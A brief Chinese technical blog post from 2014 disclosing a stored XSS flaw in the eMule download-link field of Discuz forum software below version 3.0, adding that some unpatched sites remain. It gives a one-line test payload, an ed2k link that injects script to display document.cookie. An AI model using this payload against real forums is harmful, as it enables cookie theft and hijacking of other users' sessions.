dz电驴下载xss 2014.04.25 技术类 阅读: 7947 0 评 电驴下载地址是dz3.0以下的一个存储xss漏洞,现在3.1了,还有未修复的站。测试代码如下: ed2k://|file|test|'+alert(document.cookie)+'|test/